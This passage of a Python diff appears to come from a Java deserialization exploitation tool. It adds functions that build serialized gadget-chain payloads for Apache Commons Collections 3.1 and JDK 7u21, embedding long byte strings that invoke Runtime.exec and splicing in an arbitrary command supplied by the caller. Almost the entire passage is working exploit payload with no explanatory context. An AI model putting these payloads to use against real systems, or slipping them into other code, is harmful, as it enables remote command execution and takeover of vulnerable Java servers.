+\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x6D\x6C\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x73\x65\ +\x72\x69\x61\x6C\x69\x7A\x65\x72\x2F\x53\x65\x72\x69\x61\x6C\x69\x7A\x61\x74\x69\x6F\x6E\x48\x61\ +\x6E\x64\x6C\x65\x72\x3B\x29\x56\x01\x00\x08\x64\x6F\x63\x75\x6D\x65\x6E\x74\x01\x00\x2D\x4C\x63\ +\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x61\x6C\x61\x6E\x2F\ +\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x78\x73\x6C\x74\x63\x2F\x44\x4F\x4D\x3B\x01\x00\x08\x68\x61\ +\x6E\x64\x6C\x65\x72\x73\x01\x00\x42\x5B\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\ +\x70\x61\x63\x68\x65\x2F\x78\x6D\x6C\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x73\x65\x72\x69\x61\ +\x6C\x69\x7A\x65\x72\x2F\x53\x65\x72\x69\x61\x6C\x69\x7A\x61\x74\x69\x6F\x6E\x48\x61\x6E\x64\x6C\ +\x65\x72\x3B\x01\x00\x0A\x45\x78\x63\x65\x70\x74\x69\x6F\x6E\x73\x07\x00\x27\x01\x00\xA6\x28\x4C\ +\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x61\x6C\x61\x6E\ +\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x78\x73\x6C\x74\x63\x2F\x44\x4F\x4D\x3B\x4C\x63\x6F\x6D\ +\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x6D\x6C\x2F\x69\x6E\x74\x65\ +\x72\x6E\x61\x6C\x2F\x64\x74\x6D\x2F\x44\x54\x4D\x41\x78\x69\x73\x49\x74\x65\x72\x61\x74\x6F\x72\ +\x3B\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x6D\x6C\ +\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x73\x65\x72\x69\x61\x6C\x69\x7A\x65\x72\x2F\x53\x65\x72\ +\x69\x61\x6C\x69\x7A\x61\x74\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x3B\x29\x56\x01\x00\x08\x69\ +\x74\x65\x72\x61\x74\x6F\x72\x01\x00\x35\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\ +\x70\x61\x63\x68\x65\x2F\x78\x6D\x6C\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x64\x74\x6D\x2F\x44\ +\x54\x4D\x41\x78\x69\x73\x49\x74\x65\x72\x61\x74\x6F\x72\x3B\x01\x00\x07\x68\x61\x6E\x64\x6C\x65\ +\x72\x01\x00\x41\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\ +\x78\x6D\x6C\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x73\x65\x72\x69\x61\x6C\x69\x7A\x65\x72\x2F\ +\x53\x65\x72\x69\x61\x6C\x69\x7A\x61\x74\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x3B\x01\x00\x0A\ +\x53\x6F\x75\x72\x63\x65\x46\x69\x6C\x65\x01\x00\x0C\x47\x61\x64\x67\x65\x74\x73\x2E\x6A\x61\x76\ +\x61\x0C\x00\x0A\x00\x0B\x07\x00\x28\x01\x00\x33\x79\x73\x6F\x73\x65\x72\x69\x61\x6C\x2F\x70\x61\ +\x79\x6C\x6F\x61\x64\x73\x2F\x75\x74\x69\x6C\x2F\x47\x61\x64\x67\x65\x74\x73\x24\x53\x74\x75\x62\ +\x54\x72\x61\x6E\x73\x6C\x65\x74\x50\x61\x79\x6C\x6F\x61\x64\x01\x00\x40\x63\x6F\x6D\x2F\x73\x75\ +\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x61\x6C\x61\x6E\x2F\x69\x6E\x74\x65\x72\ +\x6E\x61\x6C\x2F\x78\x73\x6C\x74\x63\x2F\x72\x75\x6E\x74\x69\x6D\x65\x2F\x41\x62\x73\x74\x72\x61\ +\x63\x74\x54\x72\x61\x6E\x73\x6C\x65\x74\x01\x00\x14\x6A\x61\x76\x61\x2F\x69\x6F\x2F\x53\x65\x72\ +\x69\x61\x6C\x69\x7A\x61\x62\x6C\x65\x01\x00\x39\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\ +\x61\x70\x61\x63\x68\x65\x2F\x78\x61\x6C\x61\x6E\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x78\x73\ +\x6C\x74\x63\x2F\x54\x72\x61\x6E\x73\x6C\x65\x74\x45\x78\x63\x65\x70\x74\x69\x6F\x6E\x01\x00\x1F\ +\x79\x73\x6F\x73\x65\x72\x69\x61\x6C\x2F\x70\x61\x79\x6C\x6F\x61\x64\x73\x2F\x75\x74\x69\x6C\x2F\ +\x47\x61\x64\x67\x65\x74\x73\x01\x00\x08\x3C\x63\x6C\x69\x6E\x69\x74\x3E\x01\x00\x11\x6A\x61\x76\ +\x61\x2F\x6C\x61\x6E\x67\x2F\x52\x75\x6E\x74\x69\x6D\x65\x07\x00\x2A\x01\x00\x0A\x67\x65\x74\x52\ +\x75\x6E\x74\x69\x6D\x65\x01\x00\x15\x28\x29\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x52\x75\ +\x6E\x74\x69\x6D\x65\x3B\x0C\x00\x2C\x00\x2D\x0A\x00\x2B\x00\x2E\x01\x00") + # if running in python 3 + if version_info[0] >= 3: + payload_commons_collection += (bytes(chr(len(cmd)), 'utf-8')) + payload_commons_collection += (bytes(cmd, 'utf-8')) + else: + payload_commons_collection += (chr(len(cmd))) + payload_commons_collection += (cmd) + + payload_commons_collection += (b"\x08\x00\x30\x01\x00\x04\x65\x78\x65\x63\x01\x00\x27\x28\ +\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B\x29\x4C\x6A\x61\x76\x61\ +\x2F\x6C\x61\x6E\x67\x2F\x50\x72\x6F\x63\x65\x73\x73\x3B\x0C\x00\x32\x00\x33\x0A\x00\x2B\x00\x34\ +\x01\x00\x1E\x79\x73\x6F\x73\x65\x72\x69\x61\x6C\x2F\x50\x77\x6E\x65\x72\x31\x31\x35\x36\x36\x35\ +\x39\x33\x37\x38\x38\x36\x33\x30\x39\x01\x00\x20\x4C\x79\x73\x6F\x73\x65\x72\x69\x61\x6C\x2F\x50\ +\x77\x6E\x65\x72\x31\x31\x35\x36\x36\x35\x39\x33\x37\x38\x38\x36\x33\x30\x39\x3B\x00\x21\x00\x02\ +\x00\x03\x00\x01\x00\x04\x00\x01\x00\x1A\x00\x05\x00\x06\x00\x01\x00\x07\x00\x00\x00\x02\x00\x08\ +\x00\x04\x00\x01\x00\x0A\x00\x0B\x00\x01\x00\x0C\x00\x00\x00\x2F\x00\x01\x00\x01\x00\x00\x00\x05\ +\x2A\xB7\x00\x01\xB1\x00\x00\x00\x02\x00\x0D\x00\x00\x00\x06\x00\x01\x00\x00\x00\x2E\x00\x0E\x00\ +\x00\x00\x0C\x00\x01\x00\x00\x00\x05\x00\x0F\x00\x37\x00\x00\x00\x01\x00\x13\x00\x14\x00\x02\x00\ +\x0C\x00\x00\x00\x3F\x00\x00\x00\x03\x00\x00\x00\x01\xB1\x00\x00\x00\x02\x00\x0D\x00\x00\x00\x06\ +\x00\x01\x00\x00\x00\x33\x00\x0E\x00\x00\x00\x20\x00\x03\x00\x00\x00\x01\x00\x0F\x00\x37\x00\x00\ +\x00\x00\x00\x01\x00\x15\x00\x16\x00\x01\x00\x00\x00\x01\x00\x17\x00\x18\x00\x02\x00\x19\x00\x00\ +\x00\x04\x00\x01\x00\x1A\x00\x01\x00\x13\x00\x1B\x00\x02\x00\x0C\x00\x00\x00\x49\x00\x00\x00\x04\ +\x00\x00\x00\x01\xB1\x00\x00\x00\x02\x00\x0D\x00\x00\x00\x06\x00\x01\x00\x00\x00\x37\x00\x0E\x00\ +\x00\x00\x2A\x00\x04\x00\x00\x00\x01\x00\x0F\x00\x37\x00\x00\x00\x00\x00\x01\x00\x15\x00\x16\x00\ +\x01\x00\x00\x00\x01\x00\x1C\x00\x1D\x00\x02\x00\x00\x00\x01\x00\x1E\x00\x1F\x00\x03\x00\x19\x00\ +\x00\x00\x04\x00\x01\x00\x1A\x00\x08\x00\x29\x00\x0B\x00\x01\x00\x0C\x00\x00\x00\x1B\x00\x03\x00\ +\x02\x00\x00\x00\x0F\xA7\x00\x03\x01\x4C\xB8\x00\x2F\x12\x31\xB6\x00\x35\x57\xB1\x00\x00\x00\x00\ +\x00\x02\x00\x20\x00\x00\x00\x02\x00\x21\x00\x11\x00\x00\x00\x0A\x00\x01\x00\x02\x00\x23\x00\x10\ +\x00\x09\x75\x71\x00\x7E\x00\x1F\x00\x00\x01\xD4\xCA\xFE\xBA\xBE\x00\x00\x00\x31\x00\x1B\x0A\x00\ +\x03\x00\x15\x07\x00\x17\x07\x00\x18\x07\x00\x19\x01\x00\x10\x73\x65\x72\x69\x61\x6C\x56\x65\x72\ +\x73\x69\x6F\x6E\x55\x49\x44\x01\x00\x01\x4A\x01\x00\x0D\x43\x6F\x6E\x73\x74\x61\x6E\x74\x56\x61\ +\x6C\x75\x65\x05\x71\xE6\x69\xEE\x3C\x6D\x47\x18\x01\x00\x06\x3C\x69\x6E\x69\x74\x3E\x01\x00\x03\ +\x28\x29\x56\x01\x00\x04\x43\x6F\x64\x65\x01\x00\x0F\x4C\x69\x6E\x65\x4E\x75\x6D\x62\x65\x72\x54\ +\x61\x62\x6C\x65\x01\x00\x12\x4C\x6F\x63\x61\x6C\x56\x61\x72\x69\x61\x62\x6C\x65\x54\x61\x62\x6C\ +\x65\x01\x00\x04\x74\x68\x69\x73\x01\x00\x03\x46\x6F\x6F\x01\x00\x0C\x49\x6E\x6E\x65\x72\x43\x6C\ +\x61\x73\x73\x65\x73\x01\x00\x25\x4C\x79\x73\x6F\x73\x65\x72\x69\x61\x6C\x2F\x70\x61\x79\x6C\x6F\ +\x61\x64\x73\x2F\x75\x74\x69\x6C\x2F\x47\x61\x64\x67\x65\x74\x73\x24\x46\x6F\x6F\x3B\x01\x00\x0A\ +\x53\x6F\x75\x72\x63\x65\x46\x69\x6C\x65\x01\x00\x0C\x47\x61\x64\x67\x65\x74\x73\x2E\x6A\x61\x76\ +\x61\x0C\x00\x0A\x00\x0B\x07\x00\x1A\x01\x00\x23\x79\x73\x6F\x73\x65\x72\x69\x61\x6C\x2F\x70\x61\ +\x79\x6C\x6F\x61\x64\x73\x2F\x75\x74\x69\x6C\x2F\x47\x61\x64\x67\x65\x74\x73\x24\x46\x6F\x6F\x01\ +\x00\x10\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x01\x00\x14\x6A\x61\x76\ +\x61\x2F\x69\x6F\x2F\x53\x65\x72\x69\x61\x6C\x69\x7A\x61\x62\x6C\x65\x01\x00\x1F\x79\x73\x6F\x73\ +\x65\x72\x69\x61\x6C\x2F\x70\x61\x79\x6C\x6F\x61\x64\x73\x2F\x75\x74\x69\x6C\x2F\x47\x61\x64\x67\ +\x65\x74\x73\x00\x21\x00\x02\x00\x03\x00\x01\x00\x04\x00\x01\x00\x1A\x00\x05\x00\x06\x00\x01\x00\ +\x07\x00\x00\x00\x02\x00\x08\x00\x01\x00\x01\x00\x0A\x00\x0B\x00\x01\x00\x0C\x00\x00\x00\x2F\x00\ +\x01\x00\x01\x00\x00\x00\x05\x2A\xB7\x00\x01\xB1\x00\x00\x00\x02\x00\x0D\x00\x00\x00\x06\x00\x01\ +\x00\x00\x00\x3B\x00\x0E\x00\x00\x00\x0C\x00\x01\x00\x00\x00\x05\x00\x0F\x00\x12\x00\x00\x00\x02\ +\x00\x13\x00\x00\x00\x02\x00\x14\x00\x11\x00\x00\x00\x0A\x00\x01\x00\x02\x00\x16\x00\x10\x00\x09\ +\x70\x74\x00\x04\x50\x77\x6E\x72\x70\x77\x01\x00\x78\x75\x72\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2E\ +\x6C\x61\x6E\x67\x2E\x43\x6C\x61\x73\x73\x3B\xAB\x16\xD7\xAE\xCB\xCD\x5A\x99\x02\x00\x00\x78\x70\ +\x00\x00\x00\x01\x76\x72\x00\x1D\x6A\x61\x76\x61\x78\x2E\x78\x6D\x6C\x2E\x74\x72\x61\x6E\x73\x66\ +\x6F\x72\x6D\x2E\x54\x65\x6D\x70\x6C\x61\x74\x65\x73\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ +\x78\x70\x77\x04\x00\x00\x00\x03\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x49\x6E\ +\x74\x65\x67\x65\x72\x12\xE2\xA0\xA4\xF7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6C\x75\x65\ +\x78\x72\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4E\x75\x6D\x62\x65\x72\x86\xAC\x95\x1D\ +\x0B\x94\xE0\x8B\x02\x00\x00\x78\x70\x00\x00\x00\x01\x71\x00\x7E\x00\x29\x78") + + return payload_commons_collection + + +def generate_commons_collections31_payload(cmd): + # commons-collections 3.1 + payload_commons_collection = ( + b"\xAC\xED\x00\x05\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\x48\x61\x73\x68\x53\ +\x65\x74\xBA\x44\x85\x95\x96\xB8\xB7\x34\x03\x00\x00\x78\x70\x77\x0C\x00\x00\x00\x02\x3F\x40\x00\ +\x00\x00\x00\x00\x01\x73\x72\x00\x34\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\ +\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x6B\x65\x79\x76\x61\x6C\x75\x65\ +\x2E\x54\x69\x65\x64\x4D\x61\x70\x45\x6E\x74\x72\x79\x8A\xAD\xD2\x9B\x39\xC1\x1F\xDB\x02\x00\x02\ +\x4C\x00\x03\x6B\x65\x79\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\ +\x63\x74\x3B\x4C\x00\x03\x6D\x61\x70\x74\x00\x0F\x4C\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\x2F\x4D\ +\x61\x70\x3B\x78\x70\x74\x00\x26\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x69\x74\x68\x75\x62\x2E\x63\ +\x6F\x6D\x2F\x6A\x6F\x61\x6F\x6D\x61\x74\x6F\x73\x66\x2F\x6A\x65\x78\x62\x6F\x73\x73\x20\x73\x72\ +\x00\x2A\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\ +\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x6D\x61\x70\x2E\x4C\x61\x7A\x79\x4D\x61\x70\x6E\xE5\x94\x82\ +\x9E\x79\x10\x94\x03\x00\x01\x4C\x00\x07\x66\x61\x63\x74\x6F\x72\x79\x74\x00\x2C\x4C\x6F\x72\x67\ +\x2F\x61\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C\x6C\x65\x63\x74\x69\ +\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x3B\x78\x70\x73\x72\x00\x3A\x6F\x72\ +\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\ +\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x43\x68\x61\x69\x6E\x65\x64\x54\x72\x61\ +\x6E\x73\x66\x6F\x72\x6D\x65\x72\x30\xC7\x97\xEC\x28\x7A\x97\x04\x02\x00\x01\x5B\x00\x0D\x69\x54\ +\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x73\x74\x00\x2D\x5B\x4C\x6F\x72\x67\x2F\x61\x70\x61\x63\ +\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\ +\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x3B\x78\x70\x75\x72\x00\x2D\x5B\x4C\x6F\x72\x67\x2E\x61\ +\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\ +\x73\x2E\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x3B\xBD\x56\x2A\xF1\xD8\x34\x18\x99\x02\x00\ +\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3B\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\ +\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\ +\x72\x73\x2E\x43\x6F\x6E\x73\x74\x61\x6E\x74\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x58\x76\ +\x90\x11\x41\x02\xB1\x94\x02\x00\x01\x4C\x00\x09\x69\x43\x6F\x6E\x73\x74\x61\x6E\x74\x71\x00\x7E\ +\x00\x03\x78\x70\x76\x72\x00\x11\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x52\x75\x6E\x74\x69\x6D\ +\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3A\x6F\x72\x67\x2E\x61\x70\ +\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\ +\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x49\x6E\x76\x6F\x6B\x65\x72\x54\x72\x61\x6E\x73\x66\x6F\ +\x72\x6D\x65\x72\x87\xE8\xFF\x6B\x7B\x7C\xCE\x38\x02\x00\x03\x5B\x00\x05\x69\x41\x72\x67\x73\x74\ +\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C\x00\x0B\ +\x69\x4D\x65\x74\x68\x6F\x64\x4E\x61\x6D\x65\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\ +\x2F\x53\x74\x72\x69\x6E\x67\x3B\x5B\x00\x0B\x69\x50\x61\x72\x61\x6D\x54\x79\x70\x65\x73\x74\x00\ +\x12\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73\x3B\x78\x70\x75\x72\x00\ +\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x62\x6A\x65\x63\x74\x3B\x90\xCE\x58\x9F\ +\x10\x73\x29\x6C\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0A\x67\x65\x74\x52\x75\x6E\x74\x69\ +\x6D\x65\x75\x72\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x43\x6C\x61\x73\x73\x3B\ +\xAB\x16\xD7\xAE\xCB\xCD\x5A\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4D\ +\x65\x74\x68\x6F\x64\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x02\x76\x72\x00\x10\x6A\x61\x76\x61\x2E\ +\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\xA0\xF0\xA4\x38\x7A\x3B\xB3\x42\x02\x00\x00\x78\x70\ +\x76\x71\x00\x7E\x00\x1B\x73\x71\x00\x7E\x00\x13\x75\x71\x00\x7E\x00\x18\x00\x00\x00\x02\x70\x75\ +\x71\x00\x7E\x00\x18\x00\x00\x00\x00\x74\x00\x06\x69\x6E\x76\x6F\x6B\x65\x75\x71\x00\x7E\x00\x1B\ +\x00\x00\x00\x02\x76\x72\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x62\x6A\x65\x63\x74\ +\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7E\x00\x18\x73\x71\x00\x7E\x00\ +\x13\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\x3B\ +\xAD\xD2\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00") + # if running in python 3 + if version_info[0] >= 3: + payload_commons_collection += (bytes(chr(len(cmd)), 'utf-8')) + payload_commons_collection += (bytes(cmd, 'utf-8')) + else: + payload_commons_collection += (chr(len(cmd))) + payload_commons_collection += (cmd) + + payload_commons_collection += ( + b"\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x01\x71\x00\x7E\x00\x20\x73\x71\x00\ +\x7E\x00\x0F\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x49\x6E\x74\x65\x67\x65\x72\ +\x12\xE2\xA0\xA4\xF7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6C\x75\x65\x78\x72\x00\x10\x6A\ +\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4E\x75\x6D\x62\x65\x72\x86\xAC\x95\x1D\x0B\x94\xE0\x8B\x02\ +\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\x48\x61\ +\x73\x68\x4D\x61\x70\x05\x07\xDA\xC1\xC3\x16\x60\xD1\x03\x00\x02\x46\x00\x0A\x6C\x6F\x61\x64\x46\ +\x61\x63\x74\x6F\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6F\x6C\x64\x78\x70\x3F\x40\x00\x00\x00\ +\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x78") + + return payload_commons_collection + + +def generate_jdk7u21_payload(cmd): + # improved from frohoff version + payload = (b"\xAC\xED\x00\x05\x73\x72\x00\x17\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\x4C\x69\x6E\x6B\x65\ +\x64\x48\x61\x73\x68\x53\x65\x74\xD8\x6C\xD7\x5A\x95\xDD\x2A\x1E\x02\x00\x00\x78\x72\x00\x11\x6A\ +\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\x48\x61\x73\x68\x53\x65\x74\xBA\x44\x85\x95\x96\xB8\xB7\x34\ +\x03\x00\x00\x78\x70\x77\x0C\x00\x00\x00\x10\x3F\x40\x00\x00\x00\x00\x00\x02\x73\x72\x00\x3A\x63\ +\x6F\x6D\x2E\x73\x75\x6E\x2E\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x78\x61\x6C\x61\x6E\x2E\ +\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2E\x78\x73\x6C\x74\x63\x2E\x74\x72\x61\x78\x2E\x54\x65\x6D\x70\ +\x6C\x61\x74\x65\x73\x49\x6D\x70\x6C\x09\x57\x4F\xC1\x6E\xAC\xAB\x33\x03\x00\x08\x49\x00\x0D\x5F\ +\x69\x6E\x64\x65\x6E\x74\x4E\x75\x6D\x62\x65\x72\x49\x00\x0E\x5F\x74\x72\x61\x6E\x73\x6C\x65\x74\ +\x49\x6E\x64\x65\x78\x5A\x00\x15\x5F\x75\x73\x65\x53\x65\x72\x76\x69\x63\x65\x73\x4D\x65\x63\x68\ +\x61\x6E\x69\x73\x6D\x4C\x00\x0B\x5F\x61\x75\x78\x43\x6C\x61\x73\x73\x65\x73\x74\x00\x3B\x4C\x63\ +\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x61\x6C\x61\x6E\x2F\ +\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x78\x73\x6C\x74\x63\x2F\x72\x75\x6E\x74\x69\x6D\x65\x2F\x48\ +\x61\x73\x68\x74\x61\x62\x6C\x65\x3B\x5B\x00\x0A\x5F\x62\x79\x74\x65\x63\x6F\x64\x65\x73\x74\x00\ +\x03\x5B\x5B\x42\x5B\x00\x06\x5F\x63\x6C\x61\x73\x73\x74\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\ +\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73\x3B\x4C\x00\x05\x5F\x6E\x61\x6D\x65\x74\x00\x12\x4C\x6A\x61\ +\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B\x4C\x00\x11\x5F\x6F\x75\x74\x70\x75\ +\x74\x50\x72\x6F\x70\x65\x72\x74\x69\x65\x73\x74\x00\x16\x4C\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\ +\x2F\x50\x72\x6F\x70\x65\x72\x74\x69\x65\x73\x3B\x78\x70\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x70\ +\x75\x72\x00\x03\x5B\x5B\x42\x4B\xFD\x19\x15\x67\x67\xDB\x37\x02\x00\x00\x78\x70\x00\x00\x00\x02\ +\x75\x72\x00\x02\x5B\x42\xAC\xF3\x17\xF8\x06\x08\x54\xE0\x02\x00\x00\x78\x70\x00\x00\x06") + if version_info[0] >= 3: + payload += (bytes(chr(len(cmd)+131), 'utf-8')) + else: + payload += (chr(len(cmd)+131)) + payload += (b"\xCA\xFE\xBA\xBE\x00\x00\ +\x00\x31\x00\x38\x0A\x00\x03\x00\x22\x07\x00\x36\x07\x00\x25\x07\x00\x26\x01\ +\x00\x10\x73\x65\x72\x69\x61\x6C\x56\x65\x72\x73\x69\x6F\x6E\x55\x49\x44\x01\x00\x01\x4A\x01\x00\ +\x0D\x43\x6F\x6E\x73\x74\x61\x6E\x74\x56\x61\x6C\x75\x65\x05\xAD\x20\x93\xF3\x91\xDD\xEF\x3E\x01\ +\x00\x06\x3C\x69\x6E\x69\x74\x3E\x01\x00\x03\x28\x29\x56\x01\x00\x04\x43\x6F\x64\x65\x01\x00\x0F\ +\x4C\x69\x6E\x65\x4E\x75\x6D\x62\x65\x72\x54\x61\x62\x6C\x65\x01\x00\x12\x4C\x6F\x63\x61\x6C\x56\ +\x61\x72\x69\x61\x62\x6C\x65\x54\x61\x62\x6C\x65\x01\x00\x04\x74\x68\x69\x73\x01\x00\x13\x53\x74\ +\x75\x62\x54\x72\x61\x6E\x73\x6C\x65\x74\x50\x61\x79\x6C\x6F\x61\x64\x01\x00\x0C\x49\x6E\x6E\x65\ +\x72\x43\x6C\x61\x73\x73\x65\x73\x01\x00\x35\x4C\x79\x73\x6F\x73\x65\x72\x69\x61\x6C\x2F\x70\x61\ +\x79\x6C\x6F\x61\x64\x73\x2F\x75\x74\x69\x6C\x2F\x47\x61\x64\x67\x65\x74\x73\x24\x53\x74\x75\x62\ +\x54\x72\x61\x6E\x73\x6C\x65\x74\x50\x61\x79\x6C\x6F\x61\x64\x3B\x01\x00\x09\x74\x72\x61\x6E\x73\ +\x66\x6F\x72\x6D\x01\x00\x72\x28\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\ +\x63\x68\x65\x2F\x78\x61\x6C\x61\x6E\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x78\x73\x6C\x74\x63\ +\x2F\x44\x4F\x4D\x3B\x5B\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\ +\x65\x2F\x78\x6D\x6C\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x73\x65\x72\x69\x61\x6C\x69\x7A\x65\ +\x72\x2F\x53\x65\x72\x69\x61\x6C\x69\x7A\x61\x74\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x3B\x29\ +\x56\x01\x00\x08\x64\x6F\x63\x75\x6D\x65\x6E\x74\x01\x00\x2D\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\ +\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x61\x6C\x61\x6E\x2F\x69\x6E\x74\x65\x72\x6E\x61\ +\x6C\x2F\x78\x73\x6C\x74\x63\x2F\x44\x4F\x4D\x3B\x01\x00\x08\x68\x61\x6E\x64\x6C\x65\x72\x73\x01\ 